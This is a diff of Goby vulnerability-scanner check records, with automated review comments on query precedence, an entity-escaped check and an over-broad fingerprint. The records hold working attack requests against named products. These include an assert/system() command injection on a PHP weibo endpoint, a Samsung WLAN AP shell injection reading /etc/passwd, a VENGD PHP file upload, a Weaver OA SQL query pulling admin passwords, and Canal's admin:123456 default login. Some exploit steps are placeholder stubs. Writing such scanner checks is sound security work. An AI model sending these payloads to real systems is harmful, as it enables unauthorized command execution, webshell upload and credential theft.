"uri": "/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ipconfig)",
"follow_redirect": false,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -50,14 +54,14 @@
"SetVariable": []
}
],
"ExploitSteps": [
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system({{{Cmd}}})",
"follow_redirect": false,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -75,10 +79,10 @@
]
},
"SetVariable": [
"output|lastbody"
]
"output|lastbody|undefined|undefined"
]
}
],
"PostTime": "2021-06-28 11:44:33",
"GobyVersion": "1.8.268"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -2,18 +2,22 @@
"Name": "RuoYi Druid Unauthorized access",
"Level": "0",
"Tags": [
"Disclosure of Sensitive Information"
"infoleak"
],
"GobyQuery": "app=\"ruoyi-System\"",
"Description": "If Druid is used in the management system, anonymous access is enabled by default, resulting in unauthorized access to sensitive information",
"Description": "RuoYi",
"Product": "RuoYi",
"Homepage": "https://gitee.com/y_project/RuoYi-Vue",
"Author": "PeiQi",
"Impact": "<p>&nbsp;resulting in unauthorized access to sensitive information<br></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"Author": "",
"Impact": "If Druid is used in the management system, anonymous access is enabled by default, resulting in unauthorized access to sensitive information.",
"Recommendation": "",
"References": [],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -21,7 +25,7 @@
"method": "GET",
"uri": "/prod-api/druid/index.html",
"follow_redirect": false,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -55,6 +59,43 @@
"SetVariable": []
}
],
"PostTime": "2021-04-20 23:13:54",
"GobyVersion": "1.8.258"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -1,30 +1,42 @@
{
"Name": "Samsung WLAN AP WEA453e RCE",
"Level": "3",
"Tags": [],
"GobyQuery": "title==\"Samsung WLAN AP\"",
"Description": "三星 WLAN AP WEA453e路由器 存在远程命令执行漏洞,可在未授权的情况下执行任意命令获取服务器权限",
"Product": "三星 WLAN AP WEA453e路由器",
"Homepage": "https://www.samsung.com/",
"Author": "lxy@secbug.org",
"Impact": "<p>暂无</p>",
"Recommandation": "<p>暂无</p>",
"References": [
"Internet"
"Tags": [
"rce"
],
"GobyQuery": "title=\"Samsung WLAN AP\" || app=\"Chunjs-server\" && body=\"Samsung Electronics\"",
"Description": "Samsung WLAN AP WEA453e",
"Product": "Samsung WLAN AP WEA453e",
"Homepage": "https://www.samsung.com/",
"Author": "",
"Impact": "Samsung WLAN AP wea453e router has a remote command execution vulnerability.",
"Recommendation": "",
"References": [],
"HasExp": true,
"ExpParams": [
{
"Name": "Cmd",
"Type": "input",
"Value": "cat /etc/passwd"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"method": "GET",
"uri": "/(download)/tmp/a.txt",
"follow_redirect": true,
"follow_redirect": false,
"header": {
"Connection": "close",
"Content-Length": "48"
"Content-Type": "application/json;charset=UTF-8"
},
"data_type": "text",
"data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt"
"data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt",
"set_variable": []
},
"ResponseTest": {
"type": "group",
@ -46,9 +58,43 @@
}
]
},
"SetVariable": []
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "2021-04-01 11:47:39",
"GobyVersion": "1.8.237"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/(download)/tmp/a.txt",
"follow_redirect": false,
"header": {
"Content-Type": "application/json;charset=UTF-8"
},
"data_type": "text",
"data": "command1=shell:{{{Cmd}}}| dd of=/tmp/a.txt",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
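Review bot: The new `GobyQuery` mixes `||` and `&&` without parentheses, so which hosts this record runs against depends on the engine's operator precedence. Grouping it explicitly, e.g. `title="Samsung WLAN AP" || (app="Chunjs-server" && body="Samsung Electronics")` if that is the intent, keeps the fingerprint from widening silently. The new `ScanSteps` request also declares `Content-Type: application/json;charset=UTF-8` while `data` is still a form-style string, so header and body no longer agree and a result from this record is hard to interpret either way. `PostTime` and `GobyVersion` are reset to placeholders as elsewhere in the commit.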


@ -5,11 +5,11 @@
"infoleak"
],
"GobyQuery": "body=\"var dkey_verify = Get_Verify_Info(hex_md5)\"",
"Description": "中科网威、网域科技、锐捷、天工网络等防火墙web管理程序存在硬编码漏洞。",
"Product": "多个",
"Homepage": "",
"Author": "aetkrad",
"Impact": "",
"Description": "",
"Product": "",
"Homepage": "",
"Author": "",
"Impact": "There are hard-coded vulnerabilities in firewall web management programs such as Zhongke Wangwei, Wangyu Technology, Ruijie, and Tiangong Network.",
"Recommendation": "",
"References": [
"https://mp.weixin.qq.com/s/59-rkZUWZNtJVgIbpULnxw"
@ -94,6 +94,6 @@
]
}
],
"PostTime": "2021-12-06 16:14:12",
"GobyVersion": "1.9.310"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -4,7 +4,7 @@
"Tags": [
"unauth"
],
"GobyQuery": "app=\"SonarQube-code management\"",
"GobyQuery": "app=\"SonarQube\"",
"Description": "SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI.",
"Product": "SonarQube",
"Homepage": "https://www.sonarqube.org/",
@ -14,7 +14,7 @@
"References": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27986"
],
"HasExp": true,
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -64,50 +64,6 @@
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/api/settings/values",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "sonaranalyzer-cs.nuget.packageVersion",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "sonar.core.id",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "2022-06-25 20:10:24",
"GobyVersion": "1.9.323"
"PostTime": "2021-11-29 15:03:58",
"GobyVersion": "1.9.310"
}


@ -5,11 +5,11 @@
"getshell"
],
"GobyQuery": "title=\"和信下一代云桌面VENGD\"",
"Description": "和信创天云桌面系统存在任意文件上传",
"Description": "VENGD",
"Product": "VENGD",
"Homepage": "https://www.vesystem.com/products/3",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "VENGD Arbitrary File Upload",
"Recommendation": "",
"References": [
"https://blog.csdn.net/weixin_44146996/article/details/115611026"
@ -37,7 +37,7 @@
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv"
},
"data_type": "text",
"data": "------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\nContent-Type: image/avif\n\n<?php\nprint \"{{{str1}}}\";\n?>\n------WebKitFormBoundaryfcKRltGv--",
"data": "------WebKitFormBoundaryfcKRltGv\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\r\nContent-Type: image/avif\r\n\r\n<?php\r\nprint \"{{{str1}}}\";\r\n?>\r\n------WebKitFormBoundaryfcKRltGv--",
"set_variable": [
"str1|rand|str|7",
"r1|rand|int|8"
@ -106,7 +106,7 @@
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv"
},
"data_type": "text",
"data": "------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\nContent-Type: image/avif\n\n{{{FileContent}}}\n------WebKitFormBoundaryfcKRltGv--",
"data": "------WebKitFormBoundaryfcKRltGv\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\r\nContent-Type: image/avif\r\n\r\n{{{FileContent}}}\r\n------WebKitFormBoundaryfcKRltGv--",
"set_variable": [
"r1|rand|int|8"
]
@ -156,6 +156,6 @@
]
}
],
"PostTime": "2021-12-09 13:55:04",
"GobyVersion": "1.9.310"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -4,16 +4,23 @@
"Tags": [
"SSRF"
],
"GobyQuery": "app=\"Apache-Web-Server\" && title==\"vRealize Operations Manager\"",
"Description": "malicious attackers who access the vrealize Operations Manager API through the network can perform server-side request forgery attack to steal management credentials.",
"GobyQuery": "app=\"Apache-Web-Server\" && title=\"vRealize Operations Manager\"",
"Description": "vRealize Operations Enable self-driving IT Operations Management across private, hybrid and multi-cloud environments with a unified operations platform that delivers continuous performance, capacity and cost optimization, intelligent remediation and integrated compliance through AI/ML and predictive analytics.",
"Product": "VMWare Operations vRealize Operations",
"Homepage": "https://www.vmware.com/cn/products/vrealize-operations.html",
"Author": "PeiQi",
"Impact": "<p>&nbsp;can perform server-side request forgery attack to steal management credentials.<br></p>",
"Recommandation": "<p>undefined</p>",
"Homepage": "https://www.vmware.com/products/vrealize-operations.html",
"Author": "",
"Impact": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.",
"Recommendation": "",
"References": [
"http://wiki.peiqi.tech"
"https://nvd.nist.gov/vuln/detail/CVE-2021-21975",
"https://www.vmware.com/security/advisories/VMSA-2021-0004.html"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -64,7 +71,7 @@
"SetVariable": []
}
],
"ExploitSteps": [
"ExploitSteps": [
"AND",
{
"Request": {
@ -111,11 +118,9 @@
}
]
},
"SetVariable": [
"output|lastbody"
]
"SetVariable": []
}
],
"PostTime": "2021-04-07 23:45:28",
"GobyVersion": "1.8.255"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -8,7 +8,7 @@
"Description": "VMware vCenter Server is advanced server management software that provides a centralized platform for controlling your VMware vSphere environments, allowing you to automate and deliver a virtual infrastructure across the hybrid cloud with confidence.",
"Product": "VMware-vCenter",
"Homepage": "https://www.vmware.com/products/vcenter-server.html",
"Author": "aetkrad",
"Author": "",
"Impact": "",
"Recommendation": "",
"References": [
@ -100,6 +100,6 @@
]
}
],
"PostTime": "2021-12-02 18:50:55",
"GobyVersion": "1.9.310"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -5,15 +5,19 @@
"SQL Injection"
],
"GobyQuery": "app=\"Weaver-OA\"",
"Description": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges",
"Description": "",
"Product": "Weaver OA 8",
"Homepage": "https://www.weaver.com.cn/",
"Author": "PeiQi",
"Impact": "",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"Homepage": "https://weaver.com/",
"Author": "",
"Impact": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges.",
"Recommendation": "",
"References": [],
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -21,7 +25,7 @@
"method": "GET",
"uri": "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager",
"follow_redirect": false,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -47,7 +51,7 @@
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "<html>",
"value": "&lt;html&gt;",
"bz": ""
},
{
@ -62,6 +66,6 @@
"SetVariable": []
}
],
"PostTime": "2021-04-10 08:00:20",
"GobyVersion": "1.8.255"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
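Review bot: The `not contains` check in the third hunk now compares against `"&lt;html&gt;"`, an HTML-entity-escaped form of the old `"<html>"`. A response body carries the literal tag, not the entities, so this negative check passes for almost any response and no longer filters out ordinary HTML pages, which raises the false-positive rate of the detection. JSON strings need no HTML escaping; restore `"value": "<html>",` and check the conversion tool for the same escaping in other records.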


@ -4,17 +4,20 @@
"Tags": [
"rce"
],
"GobyQuery": "(app=\"YAPI\" | title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" | title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\")",
"Description": "YAPI是由去哪儿网移动架构组(简称YMFE一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI发布在公网且开发注册会导致攻击者注册后执行任意命令。",
"GobyQuery": "app=\"YAPI\" || title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" || title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\"",
"Description": "YApi is an efficient, easy-to-use and powerful visual interface management platform.",
"Product": "YAPI",
"Homepage": "https://github.com/YMFE/yapi",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code.",
"Recommendation": "",
"References": [
"https://www.secpulse.com/archives/162502.html",
"https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b",
"https://twitter.com/sec715/status/1415484190561161216",
"https://mp.weixin.qq.com/s/zobag3-fIl_0vrc8BrnRjg"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -64,6 +67,43 @@
]
}
],
"PostTime": "2021-12-01 20:34:40",
"GobyVersion": "1.9.310"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -1,18 +1,20 @@
{
"Name": "alibaba canal default password",
"Level": "3",
"Name": "Alibaba Canal Default Password",
"Level": "2",
"Tags": [
"defaultaccount"
],
"GobyQuery": "(title=\"Canal Admin\"|body=\"Canal Admin Login\")",
"Description": "alibaba canal has a default password problem. Attackers can log in through admin:123456",
"Product": "Remote attacker can use this default to control the system",
"GobyQuery": "title=\"Canal Admin\" || body=\"Canal Admin Login\"",
"Description": "Alibaba Canal is Incremental log parsing based on MySQL database, providing incremental data subscription and consumption.",
"Product": "Alibaba Canal",
"Homepage": "https://github.com/alibaba/canal",
"Author": "aetkrad",
"Impact": "",
"Recommendation": "",
"References": [],
"HasExp": false,
"Author": "",
"Impact": "Alibaba Canal has a default password vulnerability, an attacker can use the administrator account admin:123456 login.",
"Recommendation": "Modify Alibaba Canal administrator's default password.",
"References": [
"https://github.com/alibaba/canal/wiki/ClientAdapter"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -128,6 +130,6 @@
]
}
],
"PostTime": "2021-10-31 17:23:05",
"GobyVersion": "1.8.302"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -1,19 +1,25 @@
{
"Name": "fahuo100_sql_injection_CNVD_2021_30193",
"Level": "3",
"Name": "Fahuo100 SQL Injection CNVD-2021-30193",
"Level": "2",
"Tags": [
"SQL Injection"
],
"GobyQuery": "header=\"Cache-Control: no-store, no-cache\"",
"Description": "发货100 M_id参数存在SQL注入漏洞 攻击者通过漏洞可以获取数据库敏感信息",
"Product": "发货100",
"Description": "Fahuo100 virtual goods automatic delivery system is a powerful virtual goods automatic delivery system/article paid reading system.",
"Product": "Fahuo100",
"Homepage": "https://www.fahuo100.cn/",
"Author": "gobysec@gmail.com",
"Impact": "",
"Recommandation": "<p>undefined</p>",
"Author": "",
"Impact": "Fahuo100 M_id SQL Injection",
"Recommendation": "",
"References": [
"https://gobies.org/"
"https://www.cnvd.org.cn/flaw/show/CNVD-2021-30193"
],
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -21,7 +27,7 @@
"method": "GET",
"uri": "/?M_id=1'&type=product",
"follow_redirect": true,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -48,6 +54,6 @@
"SetVariable": []
}
],
"PostTime": "2021-06-03 22:27:28",
"GobyVersion": "1.8.268"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
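Review bot: The commit renames the record and cites the CNVD entry but leaves `"GobyQuery": "header=\"Cache-Control: no-store, no-cache\""` as the fingerprint, which matches a generic caching header rather than anything specific to Fahuo100. With a selector this broad the check is sent to unrelated products, and a finding says little about whether the host runs the affected software. The query should be narrowed to a product-specific marker (title, body string or app tag; the page does not show one, so this needs input from someone with a reference installation). `Level` is also lowered from `"3"` to `"2"` without a stated reason, which is worth a line in the commit description.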